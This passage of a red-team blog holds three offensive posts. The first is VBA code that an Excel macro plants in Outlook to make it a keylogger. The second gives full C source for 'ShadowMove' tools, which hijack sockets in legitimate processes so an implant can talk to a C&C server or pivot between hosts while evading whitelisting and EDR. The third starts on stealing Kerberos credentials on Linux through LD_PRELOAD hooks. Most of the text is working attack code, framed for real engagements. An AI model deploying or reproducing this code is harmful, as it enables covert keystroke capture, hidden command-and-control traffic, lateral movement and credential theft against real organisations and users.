wc.lpszClassName = "VBAHELLByXC3LL"
'Register our class
result = RegisterClassEx(wc)
'Create the window so we can snoop messages
HWND_MESSAGE = (-3&)
hwnd = CreateWindowEx(0, "VBAHELLByXC3LL", 0, 0, 0, 0, 0, 0, HWND_MESSAGE, 0&, GetModuleHandle(vbNullString), 0&)
End Sub
'Our callback
Private Function WndProc(ByVal lhwnd As LongPtr, ByVal tMessage As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Dim WM_CREATE As Long
Dim WM_INPUT As Long
Dim WM_KEYDOWN As Long
Dim WM_SYSKEYDOWN As Long
Dim VK_CAPITAL As Long
Dim VK_SCROLL As Long
Dim VK_NUMLOCK As Long
Dim VK_CONTROL As Long
Dim VK_MENU As Long
Dim VK_BACK As Long
Dim VK_RETURN As Long
Dim VK_SHIFT As Long
Dim RIDEV_INPUTSINK As Long
Dim RIM_TYPEKEYBOARD As Long
Dim rid(50) As RAWINPUTDEVICE
Dim RawInputHeader_ As RAWINPUTHEADER
Dim dwSize As Long
Dim fgWindow As LongPtr
Dim wSize As Long
Dim fgTitle() As Byte
Dim wKey As Integer
Dim result As Long
WM_CREATE = &H1
WM_INPUT = &HFF
WM_KEYDOWN = &H100
WM_SYSKEYDOWN = &H104
VK_CAPITAL = &H14
VK_SCROLL = &H91
VK_NUMLOCK = &H90
VK_CONTROL = &H11
VK_MENU = &H12
VK_BACK = &H8
VK_RETURN = &HD
VK_SHIFT = &H10
RIDEV_INPUTSINK = &H100
RIM_TYPEKEYBOARD = &H1&
'Check the message type and trigger an action if needed
Select Case tMessage
Case WM_CREATE ' Register us
rid(0).usUsagePage = &H1
rid(0).usUsage = &H6
rid(0).dwFlags = RIDEV_INPUTSINK
rid(0).hwndTarget = lhwnd
r = RegisterRawInputDevices(rid(0), 1, LenB(rid(0)))
Case WM_INPUT
Dim pbuffer() As Byte
Dim buffer As RAWINPUT
'First we get the size
r = NtUserGetRawInputData(lParam, &H10000003, vbNullString, dwSize, LenB(RawInputHeader_))
ReDim pbuffer(0 To dwSize - 1)
'And then we save the data
r = NtUserGetRawInputData(lParam, &H10000003, pbuffer(0), dwSize, LenB(RawInputHeader_))
If r <> 0 Then
'VBA hacky things to cast the data into a RAWINPUT struct
Call CopyMemory(buffer, VarPtr(pbuffer(0)), dwSize)
If (buffer.header.dwType = RIM_TYPEKEYBOARD) And (buffer.data.Message = WM_KEYDOWN) Or (buffer.data.Message = WM_SYSKEYDOWN) Then
'Check the window title to know where the key was sent
'We want to know if the title is the same, so when we add this info to our mail we don't paste a title per key
'Just one title and all the keys related ;)
fgWindow = GetForegroundWindow()
wSize = GetWindowTextLength(fgWindow) + 1
ReDim fgTitle(0 To wSize - 1)
r = GetWindowText(fgWindow, VarPtr(fgTitle(0)), wSize)
newTitle = ByteArrayToString(fgTitle)
If newTitle <> oldTitle Then
oldTitle = newTitle
End If
GetKeyState (VK_CAPITAL)
GetKeyState (VK_SCROLL)
GetKeyState (VK_NUMLOCK)
GetKeyState (VK_CONTROL)
GetKeyState (VK_MENU)
Dim lpKeyboard(0 To 255) As Byte
r = GetKeyboardState(lpKeyboard(0))
Select Case buffer.data.VKey
Case VK_BACK
exfil = exfil & "[<]"
Case VK_RETURN
exfil = exfil & vbNewLine
Case Else
'Something funny undocumented: ToAscii "breaks" the keyboard status, so we need to perform this shitty thing to "fix" it
'Dealing with deadkeys is a pain in the ass T_T (á, é, í, ó, ú...)
result = ToAscii(buffer.data.VKey, MapVirtualKey(buffer.data.VKey, 0), lpKeyboard(0), VarPtr(wKey), 0)
If result = -1 Then
lastKey = buffer.data.VKey
Do While ToAscii(buffer.data.VKey, MapVirtualKey(buffer.data.VKey, 0), lpKeyboard(0), VarPtr(wKey), 0) < 0
Loop
Else
If wKey < 256 Then
MsgBox Chr(wKey), 0, oldTitle
End If
If lastKey <> 0 Then
Call CopyMemory(lpKeyboard(0), VarPtr(cleaner(0)), 256)
result = ToAscii(lastKey, MapVirtualKey(buffer.data.VKey, 0), lpKeyboard(0), VarPtr(wKey), 0)
lastKey = 0
End If
End If
End Select
End If
End If
Case Else
WndProc = DefWindowProc(lhwnd, tMessage, wParam, lParam)
End Select
End Function
After filling both modules we save the project and we embed the VbaProject.OTM file inside our Excel. Next time Outlook is started (after the Excel macro changes the registry and drops the OTM) will execute our malicious VBA code, turning Outlook into a keylogger. Of course Outlook keeps working as usual.
Here we can see how it is getting the keys pressed in Remote Desktop (yep, the PoC uses MsgBox because it is Christmas and we are lazy, you can change it to send you the keys via mail as was shown before ;D)
And the trilogy ends. No more VBA for a time, we promise it!
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is a how-to on hiding your sinful connections inside connections made by legitimate programs using the ShadowMove technique. Please, take a seat and listen to the story.
This time we are going to show two crappy PoCs using ShadowMove to hide connections made by our offensive software. The first one is fully reliable, but the second has its own issues that must be solved if you are going to use it in a real operation. We’ll discuss those issues at the end of the post. That being said: enjoy the reading!
Edit 2021/02/03: Alex Ionescu contacted us via twitter to tells us that the “ShadowMove” technique was used previously by himself and @yarden_shafir. We provide here the link to their blog: Faxing Your Way to SYSTEM — Part Two
Edit 2021/02/03: One of the authors (@DissectMalware) contacted us via twitter to explain that their paper was accepted at USENIX 2020 in late 2019 and prior to the “FaxHell” blog
Edit 2021/02/03: Both researchers agreed that this was a classic collision doing research about the same topic. In our opinion everyone had good faith but social networks tends to twist this kind of situations.
ShadowMove is a novel technique to hijack sockets from non-cooperative processes. It is described in the paper ShadowMove: A Stealthy Lateral Movement Strategy presented at USENIX ‘20. This technique takes advantage of the fact that AFD (Ancillary Function Driver) file handles are treated as socket handles by Windows APIs, so it is possible to duplicate them with WSADuplicateSocket()
.
The classic schema to hijack a socket from a non-cooperative process starts with a process injection in order to load our own logic to find and reuse the target socket. But with ShadowMove you do not have to inject anything: it only requires opening a process handle with PROCESS_DUP_HANDLE rights. No extra privileges, no noisy things.
With our shinny handle we can start duplicating all file handles until we find those with name \Device\Afd
, then just use getpeername()
to check if it belongs to a connection with our target.
Why is this technique interesting for a Red Team?
We are glad you asked it! Recently we remembered a situation we had to face in an operation. We had to deploy our keylogger in a computer but it was blocking any connection made by non-whitelisted binaries. To circumvent this problem we just injected our keylogger in a process allowed to connect to the outside. But with ShadowMove we can avoid any noise potentially generated by our injections (yes, we can use all the usual suspects to bypass EDRs, but this method is cleaner, by far).
Imagine we have a keylogger and we want to use ShadowMove to send the keys intercepted to our C&C. Every time we have to send a batch of keys we need to run a legitimate program that tries to connect to our C&C, for example a mssql client, and when the connection is made we have to hijack it from our keylogger. Of course in an enterprise environment you would need to set the connection through the corporative proxy instead of directly to the C&C, but let’s forget about that for a moment.
The recipe to ShadowMove is (taken directly from the paper):
This, can be translated into the next PoC that we called “ShadowMove Gateway”. Basically, we are providing the process PID (remember: something legitimate, able to establish a connection with our C&C) and the IP of our C&C (remember: in a real scenario we have to deal with proxies).
// PoC of ShadowMove Gateway by Juan Manuel Fernández (@TheXC3LL)
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <winsock2.h>
#include <Windows.h>
#include <stdio.h>
#pragma comment(lib,"WS2_32")
// Most of the code is adapted from https://github.com/Zer0Mem0ry/WindowsNT-Handle-Scanner/blob/master/FindHandles/main.cpp
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
#define SystemHandleInformation 16
#define ObjectNameInformation 1
typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(NTAPI* _NtDuplicateObject)(
HANDLE SourceProcessHandle,
HANDLE SourceHandle,
HANDLE TargetProcessHandle,
PHANDLE TargetHandle,
ACCESS_MASK DesiredAccess,
ULONG Attributes,
ULONG Options
);
typedef NTSTATUS(NTAPI* _NtQueryObject)(
HANDLE ObjectHandle,
ULONG ObjectInformationClass,
PVOID ObjectInformation,
ULONG ObjectInformationLength,
PULONG ReturnLength
);
typedef struct _SYSTEM_HANDLE
{
ULONG ProcessId;
BYTE ObjectTypeNumber;
BYTE Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG HandleCount;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef enum _POOL_TYPE
{
NonPagedPool,
PagedPool,
NonPagedPoolMustSucceed,
DontUseThisType,
NonPagedPoolCacheAligned,
PagedPoolCacheAligned,
NonPagedPoolCacheAlignedMustS
} POOL_TYPE, * PPOOL_TYPE;
typedef struct _OBJECT_NAME_INFORMATION
{
UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION;
PVOID GetLibraryProcAddress(PSTR LibraryName, PSTR ProcName)
{
return GetProcAddress(GetModuleHandleA(LibraryName), ProcName);
}
SOCKET findTargetSocket(DWORD dwProcessId, LPSTR dstIP) {
HANDLE hProc;
PSYSTEM_HANDLE_INFORMATION handleInfo;
DWORD handleInfoSize = 0x10000;
NTSTATUS status;
DWORD returnLength;
WSAPROTOCOL_INFOW wsaProtocolInfo = { 0 };
SOCKET targetSocket;
// Open target process with PROCESS_DUP_HANDLE rights
hProc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwProcessId);
if (!hProc) {
printf("[!] Error: could not open the process!\n");
exit(-1);
}
printf("[+] Handle to process obtained!\n");
// Find the functions
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetLibraryProcAddress("ntdll.dll", "NtQuerySystemInformation");
_NtDuplicateObject NtDuplicateObject = (_NtDuplicateObject)GetLibraryProcAddress("ntdll.dll", "NtDuplicateObject");
_NtQueryObject NtQueryObject = (_NtQueryObject)GetLibraryProcAddress("ntdll.dll", "NtQueryObject");
// Retrieve handles from the target process
handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
while ((status = NtQuerySystemInformation(SystemHandleInformation, handleInfo, handleInfoSize, NULL)) == STATUS_INFO_LENGTH_MISMATCH)
handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
printf("[+] Found [%d] handlers in PID %d\n============================\n", handleInfo->HandleCount, dwProcessId);
// Iterate
for (DWORD i = 0; i < handleInfo->HandleCount; i++) {
// Check if it is the desired type of handle
if (handleInfo->Handles[i].ObjectTypeNumber == 0x24) {
SYSTEM_HANDLE handle = handleInfo->Handles[i];
HANDLE dupHandle = NULL;
POBJECT_NAME_INFORMATION objectNameInfo;
// Dupplicate handle
NtDuplicateObject(hProc, (HANDLE)handle.Handle, GetCurrentProcess(), &dupHandle, PROCESS_ALL_ACCESS, FALSE, DUPLICATE_SAME_ACCESS);
objectNameInfo = (POBJECT_NAME_INFORMATION)malloc(0x1000);
// Get handle info
NtQueryObject(dupHandle, ObjectNameInformation, objectNameInfo, 0x1000, &returnLength);
// Narrow the search checking if the name length is correct (len(\Device\Afd) == 11 * 2)
if (objectNameInfo->Name.Length == 22) {
printf("[-] Testing %d of %d\n", i, handleInfo->HandleCount);
// Check if it ends in "Afd"
LPWSTR needle = (LPWSTR)malloc(8);
memcpy(needle, objectNameInfo->Name.Buffer + 8, 6);
if (needle[0] == 'A' && needle[1] == 'f' && needle[2] == 'd') {
// We got a candidate
printf("\t[*] \\Device\\Afd found at %d!\n", i);
// Try to duplicate the socket
status = WSADuplicateSocketW((SOCKET)dupHandle, GetCurrentProcessId(), &wsaProtocolInfo);
if (status != 0) {
printf("\t\t[X] Error duplicating socket!\n");
free(needle);
free(objectNameInfo);
CloseHandle(dupHandle);
continue;
}
// We got it?
targetSocket = WSASocket(wsaProtocolInfo.iAddressFamily, wsaProtocolInfo.iSocketType, wsaProtocolInfo.iProtocol, &wsaProtocolInfo, 0, WSA_FLAG_OVERLAPPED);
if (targetSocket != INVALID_SOCKET) {
struct sockaddr_in sockaddr;
DWORD len;
len = sizeof(SOCKADDR_IN);
// It this the socket?
if (getpeername(targetSocket, (SOCKADDR*)&sockaddr, &len) == 0) {
if (strcmp(inet_ntoa(sockaddr.sin_addr), dstIP) == 0) {
printf("\t[*] Duplicated socket (%s)\n", inet_ntoa(sockaddr.sin_addr));
free(needle);
free(objectNameInfo);
return targetSocket;
}
}
}
free(needle);
}
}
free(objectNameInfo);
}
}
return 0;
}
int main(int argc, char** argv) {
WORD wVersionRequested;
WSADATA wsaData;
DWORD dwProcessId;
LPWSTR dstIP = NULL;
SOCKET targetSocket;
char buff[255] = { 0 };
printf("\t\t\t-=[ ShadowMove Gateway PoC ]=-\n\n");
// smgateway.exe [PID] [IP dst]
/* It's just a PoC, we do not validate the args. But at least check if number of args is right X) */
if (argc != 3) {
printf("[!] Error: syntax is %s [PID] [IP dst]\n", argv[0]);
exit(-1);
}
dwProcessId = strtoul(argv[1], NULL, 10);
dstIP = (LPSTR)malloc(strlen(argv[2]) * (char) + 1);
memcpy(dstIP, argv[2], strlen(dstIP));
// Classic
wVersionRequested = MAKEWORD(2, 2);
WSAStartup(wVersionRequested, &wsaData);
targetSocket = findTargetSocket(dwProcessId, dstIP);
send(targetSocket, "Hello From the other side!\n", strlen("Hello From the other side!\n"), 0);
recv(targetSocket, buff, 255, 0);
printf("\n[*] Message from outside:\n\n %s\n", buff);
return 0;
}
Here we just send the message “Hello from the other side!” from our infected machine to the “C&C” and the message “Stay hydrated!” comes from the C&C to the infected machine.
We just saw how we can use ShadowMove to turn a program into a proxy for our local implant. But this same approach can be used to communicate two machines. Imagine a scenario where we have 3 machines: A <--> B <--> C
. If we want to reach services exposed by C from A, we have to forward traffic in B (either with netsh
or by dropping a proxy). We can achieve this with ShadowMove too.
We only need to execute two legitimate programs in B: one that connects to an exposed port in A and another to the target service in C. Then we hijack both sockets and bridge them.
Note: imagine we want to execute ldapsearch
from A and the Domain Controller is at C. In A we need a script that exposes two ports, one to receive the connection from the ldapsearch
(A’) and another to receive the connection from B (A’’). So everything received in A’ is sent to A’’ (that is connected through B), then our bridge forwards everything to the connection between B and C.
The code executed in B is almost the same that we used before:
// PoC of ShadowMove Pivot by Juan Manuel Fernández (@TheXC3LL)
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <winsock2.h>
#include <Windows.h>
#include <stdio.h>
#pragma comment(lib,"WS2_32")
// Most of the code is adapted from https://github.com/Zer0Mem0ry/WindowsNT-Handle-Scanner/blob/master/FindHandles/main.cpp
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
#define SystemHandleInformation 16
#define ObjectNameInformation 1
#define MSG_END_OF_TRANSMISSION "\x31\x41\x59\x26\x53\x58\x97\x93\x23\x84"
#define BUFSIZE 65536
typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(NTAPI* _NtDuplicateObject)(
HANDLE SourceProcessHandle,
HANDLE SourceHandle,
HANDLE TargetProcessHandle,
PHANDLE TargetHandle,
ACCESS_MASK DesiredAccess,
ULONG Attributes,
ULONG Options
);
typedef NTSTATUS(NTAPI* _NtQueryObject)(
HANDLE ObjectHandle,
ULONG ObjectInformationClass,
PVOID ObjectInformation,
ULONG ObjectInformationLength,
PULONG ReturnLength
);
typedef struct _SYSTEM_HANDLE
{
ULONG ProcessId;
BYTE ObjectTypeNumber;
BYTE Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG HandleCount;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef enum _POOL_TYPE
{
NonPagedPool,
PagedPool,
NonPagedPoolMustSucceed,
DontUseThisType,
NonPagedPoolCacheAligned,
PagedPoolCacheAligned,
NonPagedPoolCacheAlignedMustS
} POOL_TYPE, * PPOOL_TYPE;
typedef struct _OBJECT_NAME_INFORMATION
{
UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION;
PVOID GetLibraryProcAddress(PSTR LibraryName, PSTR ProcName)
{
return GetProcAddress(GetModuleHandleA(LibraryName), ProcName);
}
SOCKET findTargetSocket(DWORD dwProcessId, LPSTR dstIP) {
HANDLE hProc;
PSYSTEM_HANDLE_INFORMATION handleInfo;
DWORD handleInfoSize = 0x10000;
NTSTATUS status;
DWORD returnLength;
WSAPROTOCOL_INFOW wsaProtocolInfo = { 0 };
SOCKET targetSocket;
// Open target process with PROCESS_DUP_HANDLE rights
hProc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwProcessId);
if (!hProc) {
printf("[!] Error: could not open the process!\n");
exit(-1);
}
printf("[+] Handle to process obtained!\n");
// Find the functions
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetLibraryProcAddress("ntdll.dll", "NtQuerySystemInformation");
_NtDuplicateObject NtDuplicateObject = (_NtDuplicateObject)GetLibraryProcAddress("ntdll.dll", "NtDuplicateObject");
_NtQueryObject NtQueryObject = (_NtQueryObject)GetLibraryProcAddress("ntdll.dll", "NtQueryObject");
// Retrieve handles from the target process
handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
while ((status = NtQuerySystemInformation(SystemHandleInformation, handleInfo, handleInfoSize, NULL)) == STATUS_INFO_LENGTH_MISMATCH)
handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
printf("[+] Found [%d] handlers in PID %d\n============================\n", handleInfo->HandleCount, dwProcessId);
// Iterate
for (DWORD i = 0; i < handleInfo->HandleCount; i++) {
// Check if it is the desired type of handle
if (handleInfo->Handles[i].ObjectTypeNumber == 0x24) {
SYSTEM_HANDLE handle = handleInfo->Handles[i];
HANDLE dupHandle = NULL;
POBJECT_NAME_INFORMATION objectNameInfo;
// Dupplicate handle
NtDuplicateObject(hProc, (HANDLE)handle.Handle, GetCurrentProcess(), &dupHandle, PROCESS_ALL_ACCESS, FALSE, DUPLICATE_SAME_ACCESS);
objectNameInfo = (POBJECT_NAME_INFORMATION)malloc(0x1000);
// Get handle info
NtQueryObject(dupHandle, ObjectNameInformation, objectNameInfo, 0x1000, &returnLength);
// Narrow the search checking if the name length is correct (len(\Device\Afd) == 11 * 2)
if (objectNameInfo->Name.Length == 22) {
printf("[-] Testing %d of %d\n", i, handleInfo->HandleCount);
// Check if it ends in "Afd"
LPWSTR needle = (LPWSTR)malloc(8);
memcpy(needle, objectNameInfo->Name.Buffer + 8, 6);
if (needle[0] == 'A' && needle[1] == 'f' && needle[2] == 'd') {
// We got a candidate
printf("\t[*] \\Device\\Afd found at %d!\n", i);
// Try to duplicate the socket
status = WSADuplicateSocketW((SOCKET)dupHandle, GetCurrentProcessId(), &wsaProtocolInfo);
if (status != 0) {
printf("\t\t[X] Error duplicating socket!\n");
free(needle);
free(objectNameInfo);
CloseHandle(dupHandle);
continue;
}
// We got it?
targetSocket = WSASocket(wsaProtocolInfo.iAddressFamily, wsaProtocolInfo.iSocketType, wsaProtocolInfo.iProtocol, &wsaProtocolInfo, 0, WSA_FLAG_OVERLAPPED);
if (targetSocket != INVALID_SOCKET) {
struct sockaddr_in sockaddr;
DWORD len;
len = sizeof(SOCKADDR_IN);
// It this the socket?
if (getpeername(targetSocket, (SOCKADDR*)&sockaddr, &len) == 0) {
if (strcmp(inet_ntoa(sockaddr.sin_addr), dstIP) == 0) {
printf("\t[*] Duplicated socket (%s)\n", inet_ntoa(sockaddr.sin_addr));
free(needle);
free(objectNameInfo);
return targetSocket;
}
}
}
free(needle);
}
}
free(objectNameInfo);
}
}
return 0;
}
// Reused from MSSQLPROXY https://github.com/blackarrowsec/mssqlproxy/blob/master/reciclador/reciclador.cpp
void bridge(SOCKET fd0, SOCKET fd1)
{
int maxfd, ret;
fd_set rd_set;
size_t nread;
char buffer_r[BUFSIZE];
maxfd = (fd0 > fd1) ? fd0 : fd1;
while (1) {
FD_ZERO(&rd_set);
FD_SET(fd0, &rd_set);
FD_SET(fd1, &rd_set);
ret = select(maxfd + 1, &rd_set, NULL, NULL, NULL);
if (ret < 0 && errno == EINTR) {
continue;
}
if (FD_ISSET(fd0, &rd_set)) {
nread = recv(fd0, buffer_r, BUFSIZE, 0);
if (nread <= 0)
break;
send(fd1, buffer_r, nread, 0);
}
if (FD_ISSET(fd1, &rd_set)) {
nread = recv(fd1, buffer_r, BUFSIZE, 0);
if (nread <= 0)
break;
// End of transmission
if (nread >= strlen(MSG_END_OF_TRANSMISSION) && strstr(buffer_r, MSG_END_OF_TRANSMISSION) != NULL) {
send(fd0, buffer_r, nread - strlen(MSG_END_OF_TRANSMISSION), 0);
break;
}
send(fd0, buffer_r, nread, 0);
}
}
}
int main(int argc, char** argv) {
WORD wVersionRequested;
WSADATA wsaData;
DWORD dwProcessIdSrc;
WORD dwProcessIdDst;
LPSTR dstIP = NULL;
LPSTR srcIP = NULL;
SOCKET srcSocket;
SOCKET dstSocket;
printf("\t\t\t-=[ ShadowMove Pivot PoC ]=-\n\n");
// smpivot.exe [PID src] [PID dst] [IP dst] [IP src]
/* It's just a PoC, we do not validate the args. But at least check if number of args is right X) */
if (argc != 5) {
printf("[!] Error: syntax is %s [PID src] [PID dst] [IP src] [IP dst]\n", argv[0]);
exit(-1);
}
dwProcessIdSrc = strtoul(argv[1], NULL, 10);
dwProcessIdDst = strtoul(argv[2], NULL, 10);
dstIP = (LPSTR)malloc(strlen(argv[4]) * (char) + 1);
memcpy(dstIP, argv[3], strlen(dstIP));
srcIP = (LPSTR)malloc(strlen(argv[3]) * (char) + 1);
memcpy(srcIP, argv[4], strlen(srcIP));
// Classic
wVersionRequested = MAKEWORD(2, 2);
WSAStartup(wVersionRequested, &wsaData);
srcSocket = findTargetSocket(dwProcessIdSrc, srcIP);
dstSocket = findTargetSocket(dwProcessIdDst, dstIP);
if (srcSocket == 0) {
printf("\n[!] Error: could not attach to source socket");
return -1;
}
printf("\n[<] Attached to SOURCE\n");
if (dstSocket == 0) {
printf("\n[!] Error: could not attach to sink socket");
return -1;
}
printf("[>] Attached to SINK\n");
printf("============================\n[Link up]\n============================\n");
bridge(srcSocket, dstSocket);
printf("============================\n[Link down]\n============================\n");
return 0;
}
We can test it connecting two listening netcats: one in 10.0.2.2 and other in 10.0.2.15.
-=[ ShadowMove Pivot PoC ]=-
[+] Handle to process obtained!
[+] Found [66919] handlers in PID 5364
============================
[-] Testing 3779 of 66919
[-] Testing 10254 of 66919
[*] \Device\Afd found at 10254!
[*] Duplicated socket (10.0.2.15)
[+] Handle to process obtained!
[+] Found [67202] handlers in PID 7596
============================
[-] Testing 3767 of 67202
[-] Testing 10240 of 67202
[*] \Device\Afd found at 10240!
[*] Duplicated socket (10.0.2.2)
[<] Attached to SOURCE
[>] Attached to SINK
============================
[Link up]
============================
In one of our ends:
psyconauta@insulanova:~/Research/shadowmove|⇒ nc -lvp 8081
Listening on [0.0.0.0] (family 0, port 8081)
Connection from localhost 59596 received!
Hello from 10.0.2.15!
This is me from 10.0.2.2!
Here we sumarize the problems:
Racing with the devil. We are playing with a duplicated socket, so the original program keeps doing reads. This means that some bytes can be loss if they are readed by the program instead of us, but this can be solved easy if we implemented a custom protocol that takes care of missing packets.
Timeouts. If the connection is closed by timeout before we hijack it we can not reuse the socket.
Old handles. Depending on the program in use, it is likely to find old handles that meet our criteria (getpeername
returns the target IP but the handle can not be used). This could happen if the first connection attempt was unsuccesful. To solve this just improve the detection method ;)
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is a compendium of well-known techniques used in GNU/Linux to steal kerberos credentials during post-exploitation stages. Please, take a seat and listen to the story.
The techniques discussed in this article are based on the paper Kerberos Credential Thievery (GNU/Linux) (2017). The approximation of using inotify to steal ccache files, the injection into process to extract tickets from the kernel keyring and the usage of LD_PRELOAD
have been used by us in real engagements. The rest has been just tested on lab environments.
The first approach that we are going to focus is the usage of LD_PRELOAD
to hook functions related to kerberos, so we can deploy a custom shared object destined to steal plaintext credentials from those programs using kerberos authentication.
We can check kinit
to locate what functions are susceptible to contain such information:
➜ working$ ltrace kinit [email protected]
setlocale(LC_ALL, "") = "en_US.UTF-8"
strrchr("kinit", '/') = nil
fileno(0x7fd428706a00) = 0
isatty(0) = 1
fileno(0x7fd428707760) = 1
isatty(1) = 1
fileno(0x7fd428707680) = 2
isatty(2) = 1
set_com_err_hook(0x564277f1d4b0, 0, 0, 0) = 0x7fd42870db30
getopt_long(2, 0x7ffd392b9318, "r:fpFPn54aAVl:s:c:kit:T:RS:vX:CE"..., 0x7ffd392b9090, nil) = -1
krb5_init_context(0x7ffd392b8f50, 0, 1, 0) = 0
krb5_cc_default(0x5642792154a0, 0x7ffd392b8f30, 1, 0) = 0
krb5_cc_get_type(0x5642792154a0, 0x5642792156c0, 0x7fd428bdea40, 0) = 0x7fd4289bf254
krb5_cc_get_principal(0x5642792154a0, 0x5642792156c0, 0x7ffd392b8f38, 0) = 0
krb5_parse_name_flags(0x5642792154a0, 0x7ffd392bb329, 0, 0x7ffd392b8f68) = 0
krb5_cc_support_switch(0x5642792154a0, 0x7fd4289bf254, 0x7ffd392bb344, 13) = 0
krb5_unparse_name(0x5642792154a0, 0x564279216d70, 0x7ffd392b8f70, 0) = 0
krb5_free_principal(0x5642792154a0, 0x564279216ce0, 0, 0) = 0
krb5_get_init_creds_opt_alloc(0x5642792154a0, 0x7ffd392b8f40, 0x564279214010, 0) = 0
krb5_get_init_creds_opt_set_out_ccache(0x5642792154a0, 0x564279216e30, 0x5642792156c0, 0x564279216e80) = 0
krb5_get_init_creds_password(0x5642792154a0, 0x7ffd392b8f80, 0x564279216d70, 0 <unfinished ...>
krb5_get_prompt_types(0x5642792154a0, 0x7ffd392b8f30, 0, 0) = 0x7ffd392b6ec4
krb5_prompter_posix(0x5642792154a0, 0x7ffd392b8f30, 0, 0Password for [email protected]:
) = 0
<... krb5_get_init_creds_password resumed> ) = 0
kadm5_destroy(0, 0, 0, 3) = 0x29c251f
krb5_get_init_creds_opt_free(0x5642792154a0, 0x564279216e30, 0, 3) = 0
krb5_free_cred_contents(0x5642792154a0, 0x7ffd392b8f80, 0x564279214010, 3) = 0
krb5_free_unparsed_name(0x5642792154a0, 0x564279216e00, 0x7fd428706ca0, 464) = 0
krb5_free_principal(0x5642792154a0, 0x564279216d70, 0x56427921c3d0, 1) = 0
krb5_cc_close(0x5642792154a0, 0x5642792156c0, 0x564279216df0, 1) = 0
krb5_free_context(0x5642792154a0, 0, 0x564279215c10, 0) = 0
+++ exited (status 0) +++
The functions krb5_get_init_creds_password
and krb5_prompter_posix
look interesting. The first is defined as:
krb5_error_code KRB5_CALLCONV
krb5_get_init_creds_password(krb5_context context,
krb5_creds *creds,
krb5_principal client,
const char *password,
krb5_prompter_fct prompter,
void *data,
krb5_deltat start_time,
const char *in_tkt_service,
krb5_get_init_creds_opt *options)
As we can see this function has an argument “password” that is a pointer to a string, but as the documentation states this value can be null (in which case a prompt is called, like is doing in kinit
). This function also uses a pointer to a krb5_creds
struct that is defined as:
typedef struct _krb5_creds {
krb5_magic magic;
krb5_principal client; /**< client's principal identifier */
krb5_principal server; /**< server's principal identifier */
krb5_keyblock keyblock; /**< session encryption key info */
krb5_ticket_times times; /**< lifetime info */
krb5_boolean is_skey; /**< true if ticket is encrypted in
another ticket's skey */
krb5_flags ticket_flags; /**< flags in ticket */
krb5_address **addresses; /**< addrs in ticket */
krb5_data ticket; /**< ticket string itself */
krb5_data second_ticket; /**< second ticket, if related to
ticket (via DUPLICATE-SKEY or
ENC-TKT-IN-SKEY) */
krb5_authdata **authdata; /**< authorization data */
} krb5_creds;
So we can get the username and (if set) the password used to authenticate. If the password is not provided, we need to check how the prompt is used. The function krb5_prompter_posix
is defined as:
krb5_error_code KRB5_CALLCONV
krb5_prompter_posix(
krb5_context context,
void *data,
const char *name,
const char *banner,
int num_prompts,
krb5_prompt prompts[])
The source code is easy to understand:
int fd, i, scratchchar;
FILE *fp;
char *retp;
krb5_error_code errcode;
struct termios saveparm;
osiginfo osigint;
errcode = KRB5_LIBOS_CANTREADPWD;
if (name) {
fputs(name, stdout);
fputs("\n", stdout);
}
if (banner) {
fputs(banner, stdout);
fputs("\n", stdout);
}
/*
* Get a non-buffered stream on stdin.
*/
fp = NULL;
fd = dup(STDIN_FILENO);
if (fd < 0)
return KRB5_LIBOS_CANTREADPWD;
set_cloexec_fd(fd);
fp = fdopen(fd, "r");
if (fp == NULL)
goto cleanup;
if (setvbuf(fp, NULL, _IONBF, 0))
goto cleanup;
for (i = 0; i < num_prompts; i++) {
errcode = KRB5_LIBOS_CANTREADPWD;
/* fgets() takes int, but krb5_data.length is unsigned. */
if (prompts[i].reply->length > INT_MAX)
goto cleanup;
errcode = setup_tty(fp, prompts[i].hidden, &saveparm, &osigint);
if (errcode)
break;
/* put out the prompt */
(void)fputs(prompts[i].prompt, stdout);
(void)fputs(": ", stdout);
(void)fflush(stdout);
(void)memset(prompts[i].reply->data, 0, prompts[i].reply->length);
got_int = 0;
retp = fgets(prompts[i].reply->data, (int)prompts[i].reply->length,
